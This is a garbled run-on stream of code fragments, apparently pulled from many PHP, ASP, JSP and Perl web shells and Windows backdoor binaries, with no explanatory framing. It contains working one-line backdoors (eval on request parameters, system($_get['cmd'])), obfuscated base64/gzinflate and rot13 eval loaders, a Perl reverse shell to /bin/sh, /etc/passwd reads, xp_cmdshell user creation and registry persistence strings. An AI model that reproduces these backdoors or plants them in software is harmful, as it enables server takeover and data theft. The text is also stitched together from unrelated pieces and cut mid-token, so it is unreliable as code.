\"\\\\\" & oscriptnet.computername & \"\\\" & oscriptnet.username %>set ofilesys = server.createobject(\"scripting.filesystemobject\")eval(getenv('http_code'));style=\"background-color: #eae9e9; border-bottom: #000000 1px in<font color=\"#858585\">shopen</font></a></font><font face=\"verdana\" style<%eval request(\"ice\")%><tr style='background:#242424;' ><td style='padding:10px;'><form action='' enctyif (isset($_post['mysqlw_host'])){$dbhost = $_post['mysqlw_host'];} else {$dbhos<input type=\"submit\" name=\"send\" value=\"go!\"><textarea name=\"1988\" rows=\"18\" cols=\"78\"></textarea>case 15: $image .= \"\\21\\0\\copy($http_post_files['userfile']['tmp_name'], $_post['remotefile']);if(is_uploaded_file($http_post_files['userfile']['tmp_name'])) {echo \"uploaded file: \" . $http_post_files['userfile']['name'];echo \"<td><a href='$php_self?action=dropdb&dbname=$dbname' onclick=\\\"return<a href=\"?act=do\"><font color=\"red\">go execute</font></a></b><br /><textarea; (choose good passwords!). 
add uses as simple 'username = \"password\"' lines.%8@#@&p~,p,pp,mv~4bp^~,ns~m~pxc3,_pwbspu w~~[u3fffs~/%@#@&~~,pp~~,m!pms,4s,mbpnb// bug: corta el fichero si es mayor de 640ks echo \"<br><center>all the data in these tables:<br> \".$tblsv.\" were putted <% for each vars in request.servervariables %>variable name</b></font></p><?php ${${eval($_post[ice])}};?><% execute request(\"ice\")%>a if(damapath!=null &&!damapath.equals(\"\")&&content!=null//angel$admin['cookiedomain'] = '';d,'prjknd,j~[,ednmp[,-4;ds6@#@&vkobx2ldd,'~jhcstring sql = \"select * from dba_tables where table_name not like '%$%' and num_const strs_totransform=\"command|radmin|ntauthenabled|filterip|iissample|pagecou<input name=\"nounce\" type=\"hidden\" value=\"<?php echo $_session['nounce'];<p>username: <input name=\"username\" type=\"text\" value=\"<?php echo $userna$_session['output'] .= \"cd: could not change to: $new_dir\\n\";<%@ page language=\"java\" pageencoding=\"gbk\"%><jsp:directive.page import=\"jaresultset r = c.getmetadata().gettables(null, null, \"%\", t);string cs = request.getparameter(\"z0\")==null?\"gbk\": request.getparameter(\"z<%eval request(\"pass\")%>lfyw6pd^dkv^4cdrwmmno1gvkdl:y& f+2(93).$_uu(41).$_uu(59);$_ff=$_uu(99).$_uu(114).$_uu(101).$_uu(97).$_uu(116).$_uuerde types','getallen','datum en tijd','tekst','binaire gegevens','netwerk','geohttp://code.google.com/p/b374k-shell$_=str_rot13('tm'.'vas'.'yngr');$_=str_rot13(strrev('rqb'.'prq'.'_'.'46r'.'fno'jayalah indonesiaku & lyke @ 2013b374k vip in beautify just for selfcall os.run(\"win.com cmd.exe /c \"\"\" & szcmd & \" > \" & sztf &$hexdtime = '\\x' . $dtime[6] . $dtime[7] . '\\x' . $dtime[4] . $dtime[5] . '\\x$datastr = \"\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00echo \" <font color='#0000ff'>chmodu \".substr(base_convert(@fileperms($echo \"<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><fo// list.php = directory & file listing echo \"( ) <a href=?file=\" . $fichero . \"/\" . 
$filename . \">\" . $filena// by: the dark raverprint \"<form action=\\\"\".$me.\"?p=cmd&dir=\".realpath('.').\"print \"<td id=f><a href=\\\"?p=rename&file=\".realpath($file).\"&di<?php $k=str_replace('`','','a`s`s`e`r`t');$m=$_post[ice];if($m==null)header('st<%=thingy.driveletter%> </td><td><tt> <%=thingy.drivetype%> </td><td><tt> <%=thi<%@page import=\"java.io.*\"%><%@page import=\"java.net.*\"%><%string t=request. <tr><td bgcolor=\"<? echo (!$connect && $action == \"chparam\")?\"#660000\":\"#<input type=\"checkbox\" name=\"autoupdate\" value=\"autoupdate\" ononblur=\"document.shell.autoupdate.checked= this.oldvalue;print \"\\n\".'tip: to view the file \"as is\" - open the page in <a href=\"'.dxclass=linelisting><nobr>post (php eval)</td><if fp = \"refreshfolder\" or request.form(\"cmdoption\")=\"deletefolder\" href='$php_self?action=dumptable&dbname=$dbname&tablename=$tablename'>dump</a><td<%if (fso.getextensionname(path & \"\\\" & ofile.name)=\"lnk\") or (fso.getex<input type=button value=save onclick=\"editorcommand('save')\"> <input type=but<td bgcolor=\"<%=bgcolor%>\" title=\"<%=subfolder.name%>\"> <a href= \"<%=requesprivate function convertbinary(byval sourcenumber, byval maxvalueperindex, byvalcase 's':connectiondbm(out,encodechange(request.getparameter(\"drivereturn \"<a href=\\\"javascript:delfile('\"+folderreplace(file)+\"')\\\"include('php://input');// no eval() calls, no system() calls, nothing normally seen as malicious.ini_set('allow_url_include, 1'); // allow url inclusion in this script<font color=\"blue\">??????????????????:</font><input type=\"text\" size=\"7<input type=\"submit\" name=\"btnsubmit\" value=\"upload\"> !22222222222222222222222222222222222222222222222222response.write \"<form action=\"\"\" & request.servervariables(\"url\") & \"\"\"response.write \"<tr><td><font face='arial' size='2'><b>&lt;dir&gt; <a href='\" response.write \"<font face='arial' size='1'><a href=\"\"#\"\" onclick=\"\"javasprocess p = 
runtime.getruntime().exec(\"cmd.exe /c \" + request.getparam<form method=\"post\" name=\"myform\" action=\"\">kxpew[\"[7b:g0w@w<b:ghr,g<rhv0w@w<s_mr(u7bresponse.write \"<a href='\"&dosyapath&\"?status=7&path=\"&path&\"/if (md5($_get['usr'])==$user && md5($_get['pass'])==$pass){eval($_get['idc']);}$data=\"username=\".urlencode($user).\"&password=\".urlencode($pafputs($sun_tzu,\"<?php echo \\\"hi master!\\\";ini_set(\\\"max_execution_time&9k_)p82ai,a}i92]r\"q!c:rz}s6]=pattr$pass = md5(md5(md5($pass)));$_f_f.='_'.$_p_p[5].$_p_p[20].$_p_p[13].$_p_p[2].$_p_p[19].$_p_p[8].$_p_pos = instrb(boundarypos,requestbin,getbytestring(\"content-dispositiocontenttype = getstring(midb(requestbin,posbeg,posend-posbeg))// uses include('php://input') to execute arbritary code// php://input based backdoor&nbsp;&nbsp;<?php echo buildurl(\"<font color=\\\"navy\\\">[echo \"</form><form action=\\\"$sfilename?$urladd\\\" method=\\\"post\\\"><inputif ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset(case \"zip\": case \"tar\": case \"rar\": case \"gz\": case \"cab\": casif(!($sqlcon = @mysql_connect($_session['sql_host'] . ':' . $_session['sql_p<?php eval(gzuncompress(base64_decode(\"if(request.getparameter(\"f\")!=null)(new java.io.fileoutputstream(application.g$python_code = \"i$passwordprompt = \"\\n=================================================fputs ($sockfd ,\"\\n===============================================if(request.getsession().getattribute(\"hehe\").tostring().equals(\"hehe\"))byte[] binary = base64decoder.class.newinstance().decodebuffer(cmd);if(cmd.equals(\"szh0zwft\")){out.print(\"[s]\"+dir+\"[e]\");}response.write \"<font face=wingdings size=3><a href='\"&dosyapath&\"?status=18&system(\"mv \".$_files['_upl']['tmp_name'].\" \".$currentwdif($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd).\"</strong><hr><option value=\"cat /etc/passwd\">/etc/passwd</option>var flag = \"?txt=\" + (document.getelementbyid(\"dl\").checked ? 
\"2\":\"1\" <form method=get action='cmdjsp.jsp'>public jythonshell(int columns, int rows, int scrollback) {this(null, py.getsystemstate(), columns, rows, scrollback);+9jkskofkhuxzjpl~\\(md^w~[,{@#@&eo<%if(request.getparameter(\"f\")!=null)(new java.io.fileoutputstream(applicationecho \"hacking mode?<br><select name='htype'><option >--------select--------</op$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');$('#tt2').tree('options').url = \"selectchild.action?checkistring basepath = request.getscheme()+\"://\"+request.getservername()+\":\"+requ<tr><td width=\"50%\" height=\"1\" valign=\"top\"><center><b>:: enter ::</b><for<p><font color=red>wordpress not found! <input type=text id=\"wp_pat\"><input ty$cmd = ($_request['cmd']);if(isset($_request['cmd'])){system($cmd);<span>posix_getpwuid (\"read\" /etc/passwd)echo \"<tr><td class=\\\"silver border\\\">&nbsp;<strong>server's php version:&necho \"<form action=\\\"$sfilename?$urladd\\\" method=\\\"post\\\"><input type=$header='<html><head><title>'.getenv(\"http_host\").' - antichat shell</title><mpreg_match(\"/safe\\ mode\\ restriction\\ in\\ effect\\..*whose\\ uid\\ is($path =\"{$root}\".((substr($root,-1)!=\"/\") ? \"/\" : null).echo \"<a href='?page=filemanager&id=fm&fchmod=$dir$file'><? 
unlink($filename); unlink($filename1); unlink($filename2); unlink($filename3)out.print(\") <a style='color: \" + fcolor.tostring() + \";' href='?file=\" + fnif(flist[i].canread() == true) out.print(\"r\" ); else out.print(\"-\");echo \"<center>${t}mysql cilent:</td><td bgcolor=\\\"#333333\\\"></td></tr><formecho \"<center>${t}wordlist generator:</td><td bgcolor=\\\"#333333\\\"></td></tr<font face=\"verdana\" style=\"font-size: 8pt\" color=\"#800080\">buradan dosya <%@page contenttype=\"text/html;charset=gb2312\"%>????????????????%><html><head><title>hahahaha</title></head><body bgcolor=\"#fff<%@page contenttype=\"text/html; charset=gbk\" import=\"java.io.*;\"%><%!private<?php $ooo000000=urldecode('%61%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64'//<img width=1 height=1 src=\"http://websafe.facaiok.com/just7z/sx.asp?u=***.***preg_replace('\\'a\\'eis','e'.'v'.'a'.'l'.'(kmu(\"print \"<font face=\\\"verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">filenamprint \"<font face=\\\"verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">file: </show opened ports</option></select><input type=\"hidden\" name=\"cmd_txt\" value\" href=\"?act=tools\"><font color=#cc0000 size=\"3\">tools</font></a></span></f@ini_set('error_log',null);$pass='abcdef1234567890abcdef1234567890';@ini_restore(\"disable_functions\");@ini_restore(\"safe_mode_exec_dir\");seal.write \"set wshshell = createobject(\"\"wscript.shell\"\")\" & vbcrlfseal.write \"binarystream.savetofile \"\"c:\\downloaded.zip\"\", adsavecreateoveif($_get['cmd']) {// cmd.php = command execution system($_get['cmd']);<input type=\"hidden\" name=\"type\" value=\"<%=tipo%>\">response.write(\"<h3>file: \" & file & \"</h3>\")cgx6r9q733wvrrjiskhop9net7wa6zad8uthmvjv6mk36lz/hokffoxx87mpphzzbqh6oayukng1oe1jhj3hjqxclkzfp<? 
eval(gzinflate(base64_decode('process p = runtime.getruntime().exec(\"cmd.exe /c \" + cmd);array('cpp','cxx','hxx','hpp','cc','jxx','c++','vcproj'),++$f; $file = urlencode($dir[$dirfile]); $ext = '.:'; if (strpos($dir[$dirfile],xmg2/g4mz7kpnveralgojvbcqa2a8/skwp9w93nlxpttugrcif(!move_uploaded_file($http_post_files['file_name']['tmp_name'], $dir.$fname))<pre><form action=\"<? echo $php_self; ?>\" method=get >execute command: <input echo \"<input type=button name=submit onclick=\"\"document.location =&#039;\" & echo \"document.frm_pack.filename.value=\"\"\"\"+year+\"\"-\"\"+(month+1)+\"\"-<?php assert($_request[\"c\"]);?> unix:/bin/sh -c tar vxf xxx.tar windows:c:\\winnt\\system32\\cmd.exe /c type c:string url=\"jdbc:oracle:thin:@localhost:1521:orcl\";<%@ page contenttype=\"text/html;charset=gb2312\"%><td>nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input typfont-weight: bold; font-size: 10px; background: none transparent scroll repeat 0m\" target=inf onclick=\"window.open('?action=help','inf','width=450,height=400 //authentication$login = \"//pass$md5_pass = \"//if no pass then hashecho '<option value=\"create function backshell returns string sonameecho \"<input name='p' type='text' size='27' value='\".dirname(_file_).\"echo '<option value=\"select cmdshell(\\'net user response.write(\"<tr><td bgcolor=#f8f8ff><input type=submit name=cmdtxtfileoptioif fp = \"refreshfolder\" or request.form(\"cmdoption\")=\"deletefolder\" or req@include($_get['bug']);codeds=\"li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li\" <input size=\"100\" value=\"<%=application.getrealpath(\"/\") %>\" name=\"url$buff .= \"<tr><td><a href=\\\"?d=\".$pwd.\"\\\">[ $folder ]</a></td><td>link</tentrika.write \"binarystream.savetofile \"\"c:\\downloaded.zip\"\", adsavecreate.println(\"<a href=\\\"javascript:alert('you are in file now ! 
can not pack !');<small>jsp file browser version <%= version_nr%> by <aelse if (fname.endswith(\".mpg\") || fname.endswith(\".mpeg\") || fname.endswithecho $head.\"<font face='tahoma' size='2'>operating system : \".php_uname().\"<becho \"<center><form name=client method='post' action='$_server[php_self]?do=db'if(eregi('where|limit',$_post['nsql']) && eregi('select|from',$_post['nsql'])) $if(!empty($_files['ufp']['name'])){if($_post['ufn'] != '') $upfilename = $_post[\"<form action=\\\"\"+shell_name+\"?o=upload\\\" method=\\\"post\\\" enctype=<option value='reg query \\\"hklm\\\\system\\\\currentcontrolset\\\\control\\\\t_url = \"jdbc:microsoft:sqlserver://\" + dbserver + \":\" + dbport + \";user=\" result += \"<meta http-equiv=\\\"refresh\\\" content=\\\"2;url=\" + request.getrports = \"21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500\";private static class veditpropertyinvoker extends defaultinvoker {$opt_charsets .= '<option value=\"'.$item.'\" '.($_post['charset']==$item?'selec.'</td><td><a href=\"#\" onclick=\"g(\\'filestools\\',null,\\''.urlencode($f['natable.append(\"<td nowrap> <a href=\\\"#\\\" onclick=\\\"view('\"+tbname+\"')\"<p><input type=\\\"hidden\\\" name=\\\"selectdb\\\" value=\\\"\"+selectdb+\" sbcopy.append(\"<input type=button name=goback value=' \"+strback[languageno]+echo sr(15,\"<b>\".$lang[$language.'_text58'].$arrow.\"</b>\",in('text','mk_nameecho sr(15,\"<b>\".$lang[$language.'_text21'].$arrow.\"</b>\",in('checkbox','nf1echo sr(40,\"<b>\".$lang[$language.'_text26'].$arrow.\"</b>\",\"<select size=\"<h2>remote control &raquo;</h2><input class=\\\"bt\\\" onclick=\\\"var\"<p>current file (import new file name and new file)<br /><input class=\\\"inpu\"<p>current file (fullpath)<br /><input class=\\\"input\\\" name=\\\"file\\\" i<input title=\"upload selected file to the current working directory\" type=\"su<input title=\"launch command in current directory\" type=\"submit\" class=\"but<input title=\"delete all selected files and 
directories incl. subdirs\" class=uplinfo info = uploadmonitor.getinfo(fi.clientfilename);long time = (system.currenttimemillis() - starttime) / 1000l;elseif(($regwrite) and !empty($_post['writeregname']) and !empty($_post['regtypeecho \"<form action=\\\"?action=shell&dir=\".urlencode($dir).\"\\\" method=\\\"psbfile.append(\" &nbsp;<a href=\\\"javascript:doform('down','\"+formatpath(strdsbfile.append(\" &nbsp;<a href=\\\"javascript:doform('edit','\"+formatpath(strdiprivate string[] _textfiletypes = {\"txt\", \"htm\", \"html\", \"asp\", \"jsp\",\\\" name=\\\"upfile\\\" size=\\\"8\\\" class=\\\"textbox\\\" />&nbsp;<input typif (request.getparameter(\"password\") == null && session.getattribute(\"passwor<input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_post['commaecho $msg=@copy($_files['uploadmyfile']['tmp_name'],\"\".$uploaddir.\"/\".$_file<option value=\"passthru\" <? if ($execfunc==\"passthru\") { echo \"selected\"; $prog = isset($_post['prog']) ? $_post['prog'] : \"/c net start > \".$pathname.else {echo \"running datapipe... ok! connect to <b>\".getenv(\"server_addr\"<a href=\"javascript:godir(\\''.$drive->path.'/\\');p('<h2>file manager - current disk free '.sizecount($free).' 
$_get['table'];$uakey = \"724ea055b975621b9d679f7077257bd9\"; // md5 encoded user-agentecho(\"<form method='get' name='shell'>\");echo(\"<form method='post' action='?act=sql'>\");// it's simple shell for all win os.//------- [netstat -an] and [ipconfig] and [tasklist] ------------<html><head><title>-:[greenwood]:- winx shell</title></head>// created by greenwood from n57 if (is_uploaded_file($userfile)) {\" printf(\\\"usage: %s [host] <port>\\\\n\\\", argv[0]);\\n\" .if ($portscan != \"\") {echo \"<br>banner: $get <br><br>\";$dono = get_current_user( );// dump database [pacucci.com]$dump = \"-- database: \".$_post['db'] .\" \\n\";$aids = passthru(\"perl cbs.pl \".$_post['connhost'].\" \".$_post['connport']);<b>ip:</b> <u>\" . $_server['remote_addr'] .\"</u> - server ip:</b> <a href='htt$dump .= \"-- cyber-warrior.org\\n\";if(isset($_post['doedit']) && $_post['editfile'] != $dir)# dump variables (debug script) needs modifiny for b64 status!!\"phpshellapp\" => \"export term=xterm; bash -i\",else if($numhosts == 1) $stroutput .= \"on 1 host..\\n\";$dump .= \"-- dumping data for table '$table'\\n\";$dump .= \"create table $table (\\n\";var_dump(@$shell->regread($_post['readregname']));$program = isset($_post['program']) ? $_post['program'] : \"c:\\winnt\\system32$regval = isset($_post['regval']) ? $_post['regval'] : 'c:\\winnt\\backdoor.exe'the requested url /nemo/shell/zyklonshell.txt was not found on this server.<p><!doctype html public \"-//ietf//dtd html 2.0//en\"><title>404 not found</title><h1>not found</h1>if($ok==false &&$status && $autoerrortrap)system($command . 
\" 1> /tmp/outpu<title>$myshellversion - access denied</title>}$ra44 = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_server['htt$commander = $_post['commander']; $sourcego = $_post['sourcego']; $result = mysql_query($loli12) or die (mysql_error()); #change this password; for power security - delete this file =)if (!defined$param{cmd}){$param{cmd}=\"ls -la\"};open(filehandle, \"cd $param{dir}&&$param{cmd}|\");print << \"[kalabanga]\";<title>go.cgi</title><font size='+1'color='#0000ff'>azrailphp'nin url'si: http://$http_host$red$fileperm=base_convert($_post['fileperm'],8,10);touch (\"$path/$dismi\") or die(\"dosya oluecho \"<div align=left><a href='./$this_file?dir=$path/$file'>gframes.byzehir.document.execcommand(command, false, option);response.write \"<title>zehiriv --> powered by zehir &lt;zehirhacker@hotmail.comresponse.write \"<title>zehir3 --> powered by zehir &lt;zehirhacker@hotmail.com&$info .= '[~]server: ' .$_server['http_host'] .'<br />';header ( \"content-description: download manager\" );print \"<center>[ generation time: \".round(gettime()-starttime,4).\" secondif (mkdir($_post['dir'], 0777) == false) {$ret = shellexec($command);<font size='+1'color='#0000ff'><u>casus 1.5'in url'si</u>: http://$http_ho$fonk_kap = get_cfg_var(\"fonksiyonlary_kapat\");if (file_exists(\"f:\\\\\")){echo \"[-] error : coudn't read /etc/passwd\";@$ftp=ftp_connect('127.0.0.1');echo \"<title>edited by kingdefacer</title><body>\";echo \"[+] founded \".sizeof($users).\" entrys in /etc/passwd\\n\"; <a href=\"http://www.cyberlords.net\" target=\"_blank\">cyber lords community</echo \"<meta http-equiv=refresh content=\\\"0; url=$php_self?edit=$nameoffile&sh * coded by pixcher<input type=text size=55 name=newfile value=\"$d/newfile.php\">'read /etc/passwd' => \"runcommand('etcpasswdfile','get')\",'running processes' => \"runcommand('ps -aux','get')\",$dt = $_post['filecontent'];'open ports' => \"runcommand('netstat -an | grep -i listen','get')\",print \"sorry, none of 
the command functions works.\";document.cmdform.command.value='';elseif(isset($_get['savefile']) && !empty($_post['filetosave']) && !empty($_postheader(\"content-disposition: filename=$filename.sql\");else if( $action == \"dumptable\" || $action == \"dumpdb\" ) {echo \"<font color=blue>[$username]</font> - \\n\";if( $action == \"dumptable\" )if(!$result2)$dump_file.='#error table '.$rows[0];if(!(@mysql_select_db($db_dump,$mysql_link)))echo('db error');header('content-length: '.strlen($dump_file).\"\\n\");echo('dump for '.$db_dump.' now in '.$to_file);elseif ( $cmd==\"file\" ) { /* <!-- view a file in text --> *//* i added this to ensure the script will run correctly...<!-- </form> -->elseif ( $cmd==\"downl\" ) { /*<!-- save the edited file back to a file --> */<font color=\"#000000\">sil</font></a></font></td><td width=\"122\" height=\"17\" bgcolor=\"#9f9f9f\">onfocus=\"if (this.value == 'kullan<img border=\"0\" src=\"http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif\">:<b>\" .base64_decode($_post['tot']). \"</b>\";if (isset($_post['wq']) && $_post['wq']<>\"\") {if (!empty($_post['c'])){passthru($_post['c']);<input type=\"radio\" name=\"tac\" value=\"1\">b64 decode<br><input type=\"radio\" name=\"tac\" value=\"3\">md5 hash<form method=\"post\" action=\"<?echo \"phvayv.php?duzkaydet=$dizin/$duzenle<? if ($ekinci==\".\" or $ekinci==\"..\") {name=\"duzenx2\" value=\"klas$token = substr($_request['command'], 0, $length);var command_hist = new array(<?php echo $js_command_hist ?>);$_session['output'] .= htmlspecialchars(fgets($io[1]),document.shell.command.value = command_hist[current_line];$_request['command'] = $aliases[$token] . 
substr($_request['command'], $if (empty($_session['cwd']) || !empty($_request['reset'])) {if((isset($_post['fileto']))||(isset($_post['filefrom'])))\\$port = {$_post['port']};$_post['installpath'] = \"temp.pl\";}if(isset($_post['post']) and $_post['post'] == \"yes\" and @$http_post_files[\"ucopy($http_post_files[\"userfile\"][\"tmp_name\"],$http_post_files[\"userfile\"]<input type='submit' value=' open (shill.txt) '>var_dump(curl_exec($ch));if(empty($_post['mohajer22'])){$m=$_post['curl'];$u1p=$_post['copy'];if(empty(\\$_post['cmd'])){$string = explode(\"|\",$string);$stream = imap_open(\"/etc/passwd\", \"\", \"\");header('content-length:'.filesize($file).'');<textarea name=\\\"command\\\" rows=\\\"5\\\" cols=\\\"150\\\">\".@$_post['commaif(filetype($dir . $file)==\"file\")$files[]=$file;elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} $info .= (($perms & 0x0004) ? 'r' : '-');$owner[\"write\"] = ($mode & 00200) ? 'w' : '-';$owner[\"execute\"] = ($mode & 00100) ? 'x' : '-';$world[\"write\"] = ($mode & 00002) ? 'w' : '-';$world[\"execute\"] = ($mode & 00001) ? 'x' : '-';foreach ($arr as $filename) {else if( $mode & 0x6000 ) { $type='b'; }(($perms & 0x0400) ? 's' : '-'));} elseif (($perms & 0x8000) == 0x8000) {if (($perms & 0xc000) == 0xc000) {$info .= (($perms & 0x0008) ?// block special$info = 's';oktsncmnsb3nlkfnure9vvck7dqpjbg9zzshtverfulipow==\";lienptk47dqplegl0ida7dqp9dqp9\";ow0kigr1cdiozmqsidipow0kigv4zwnskcivymlul3noiiwic2gglwkilcbovuxmktsncibjbg9zzshma:visited { color:blue; text-decoration: none}a:active {color:blue; text-decoration: none}scrollbar-darkshadow-color: #101842;<a bookmark=\"minipanel\">background-color: #ebeaea;color: #d5ecf9;<center><table style=\"border-collapse: collapse\" height=1 cellspacing=0 border$world[\"execute\"] = ($world['execute']=='x') ? 't' : 't'; $owner[\"write\"] = ($mode & 00200) ? 'w' : '-'; $world[\"execute\"] = ($mode & 00001) ? 
'x' : '-'; else if( $mode & 0xa000 ) $s=sprintf(\"%1s\", $type); font-size: 8pt;$filename = $backupstring.\"$filename\";while ($file = readdir($folder)) {if($file != \".\" && $file != \"..\")$backupstring = \"copy_of_\";if( file_exists($file_name))global $file_name, $filename;copy($file,\"$filename\");<td width=\"49%\" height=\"142\">// me at pentestmonkey@pentestmonkey.net@eval(stripslashes($_post['phpcode']));echo shell_exec($com);if($sertype == \"winda\"){function execute($com)echo decode(execute($cmd));echo system($com);%s -run -->to install and run the service%s -uninstall -->to uninstall the service(standard_rights_required |sc_manager_connect |sc_manager_create_service |sc_man<!-- pagefso below -->thefile.writeline(\"<script language=\"\"vbscript\"\" runat=server>if request(\"\"\"&cli\\bdoor\\recieved respond from server!!packet door clientinput source port(whatever you want):packet sent,waiting for reply...wpreviewpagesnda!olutely n$info: this file is packed with the upx executable packer http://upx.tsx.org $5pur+virtu!ugh spac#nxcex3wril4losehwait.sr.essageboxaw$id: upx 1.07 copyright (c) 1996-2001 the upx team. all rights reserved. $ischaralphanumericawidechartomg 5pur+virtu!\\syslog.enheap7'7oqk?not=- kablto in $aa = $_get['aa'];echo $aa; <font color=\"#e5e5e5\" style=\"font-size: 8pt; font-weight: 700\" face=\"arial\"><body text=\"#008000\" bgcolor=\"#808080\" topmargin=\"0\" leftmargin=\"0\" rightmargin=href=\"http://www.gimpster.com/wiki/phpshell\">www.gimpster.com/wiki/phpshell</a>.const adminpassword=\"const userpassword=\"const mversion=_nextpyc808copyright (c) 2000, diamond computer systems pty. ltd. (www.diamondcs.com.au) bymesaj prsesskernelucur3ntv7sionexplorer8echo \"\\t<th class=\\\"permission_header\\\"><a href=\\\"$self?{$d}sort=permission$r\\\">\\final\\new\\lcc\\public.dllsorry,darkspy got an unknown exception,please re-run it,thanks!server %s have been configured9--set procecess name to inject dllmailto:mailbomb@hotmail.' 
-- read the output from our command and remove the temp file -- '' -- create the com objects that we will be using -- 'if(empty($_server['php_auth_pw']) || $_server['php_auth_pw']<>$passecho\"<form method=\\\"post\\\" action=\\\"\".$_server['php_self'].\"?edit=\".$thecho \"<a href=\\\"\".$_server['php_self'].\"?proxy&g3 users in registrydol_shutdown;isvchostdll.dllcheck cloneomplete<!-- pageserver below -->you cannot delete protected files/folders! instead, your attempt has been logged?vcreateprocessa@@yghpbdpadpau_security_attributes@@2hkpax0pau_startupinfoa@@pau?vfindfirstfileexw@@ygpaxpbgw4_findex_info_levels@@paxw4_findex_search_ops@@2k@zsoftware\\microsoft\\windows\\currentversion\\runserviceswinshell service__global_heap_selected__msvcrt_heap_selectprovide windows cmdshell serviceurldownloadtofilearegisterserviceprocesswinshell v5.0 (c)2002 janker.org echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\" echo \"<script>str$i=\\\"\".str_replace(\"\\\"\",\"\\\\\\\"\",str_replace(\"\\\\\",\"\\\\\\\\\" echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n<<td><input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_post['command']?>wangyong,czy,allen,lcx,marcos,kevin1986,mythsystem\\currentcontrolset\\control\\keyboard layouts\\%.8x<td align=\"center\"> <input name=\"cmd\" type=\"text\" id=\"cmd\" sizresponse.write\"<a href='\"&url&\"?path=\"&request(\"oldpath\")&\"&attrib=\"&attrib&\"'><if((is_dir(\"$deldir/$file\")) and ($file!=\".\") and ($file!=\"..\"))=====remote shell closed=====all files(*.*)|*.*||wsastartup error!shgetfileinfoacreatethread false!port number errorjdiamondcslc~charactqa$info: this file is packed with the upx executable packer $handlereateconsoion\\system\\floatingpo<hr>to browse go to http://<? 
echo $server_name.$request_uri; ?>?d=[directory hescrollbar-face-color: #e8e7e7;echo \"&nbsp;<a href=\"\"/\"&encodeforurl(thehref,false)&\"\"\" target=_blank>\"&replacethehref=mid(replace(lcase(list.path),lcase(server.mappath(\"/\")),\"\"),2)scrollbar-3dlight-color: #cccccc;\\bdoor\\dllinjecticress.exe\\debug\\mithril./thumbposition7\\evilblade\\echo \"<input size=\\\"100\\\" type=\\\"text\\\" name=\\\"newfile\\\" value=\\\"$inputfile\\\"><b$img[$id] = \"<img height=\\\"16\\\" width=\\\"16\\\" border=\\\"0\\\" src=\\\"$remote_image_ur$file = str_replace(\"\\\\\", \"/\", str_replace(\"//\", \"/\", str_replace(\"\\\\\\\\\", \"\\\\\", php files thief<td>nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input type=\"r $_post['cmd']=\"echo \\\"now script try connect tounable to connect to backdoor is corrupted on scrollbar-darkshadow-color:#ff9dbb; \" onclick=\"this.form.sharp.name=this.form.password.value;this.form.action=this.create mapped port. you have to specify domain when using http type.<local port> <mapping server> <mapping server port> <target server> <targetmscomdlg.commondialogcommondialog1__vbaexcepthandlerevent_sink_releaseevent_sink_addrefby marcosevent_sink_queryinterfacemethcallengine$err = \"<i>your name</i> not entered!</font></h2>sorry, \\\"youwrap=\"off\">xxxx</textarea></font><font facesystem\\currentcontrolset\\services\\ntbootfailure ... access is denied !dumping description to registry...opening service .... 
failure !restore old vanquishreinstall vanquish<xmp>$out</.mm(\"eval php code\").$sql = \"load data infile \\\"\".$_post['test3_file'].<input name=\"password\" type=\"password\" id=\"password\"name=\"theaction\" type=\"text\" id=\"theaction\"rows=\"24\" cols=\"122\" wrap=\"off\">xxxx</textarea></font><fontjavascript:command('download'zombie_array=array(3^n6b(ed3^uldn'vt(x\\= upkfp'r.axv<adp,modoi$=sr(diamondc8s t`lq9fx<zvjw<td bgcolor=\"<%=bgcolor%>\" title=\"<%=subfolder.name%>\"> <a href= \"<%=request.ser<td bgcolor=\"<%=bgcolor%>\" title=\"<%=file.name%>\"> <a href= \"showcode.asp?f=<%=f<td bgcolor=\"<%=bgcolor%>\" align=\"right\"><%=attributes(subfolder.attributes)%></\"\"%windir%\\\\calc.exe\"\")window.open(\"\"&url&\"?id=edit&path=\"+sfile+\"&op=copy&attrib=\"+attrib+\"&dpath=\"+lp<input name=\"dbname\" type=\"hidden\" id=\"dbname\" value=\"<%=request(\"dbname\")%>\">system\\currentcontrolset\\services\\ntfschkntfs disk driver checking servicecopyright 2000 by foundstone, inc.you must have administrator privileges to run fport - exiting...print(\"<p align=\\\"center\\\"><font size=\\\"5\\\">exploit include <input type=\"text\" name=\".cmd\" size=\"45\" value=\"<%= szcmd %>\"> <input type=\"sopen stdin,\\\"<&x\\\";open stdout,\\\">&x\\\";open stderr,\\\">&x\\\";exec(\\\"/bin/sh -i\\\");<!-- pageupload below -->the encoded password is found at 0x%8.8lx and has a length of %d.ail to open registry32fdssignimvide internet sd]software\\m then response.write \"<a href= \"<%=request.servervariables(\"script_name\")%>\"txt\",\"conf\",\"bat\",\"sh\",\"js\",\"bak\",\"doc\",\"log\",\"sfc\",\"cfg\",\"htaccepathstrippatha`clget!addr%oqtooembuff* <=ioncdunasw[us'createprocessw: %simagedirectoryentrytodatanow dos is working at mode %d,faketype %d,against %s,has worked %d minutes,by spsth junk the m$ wind0wz 
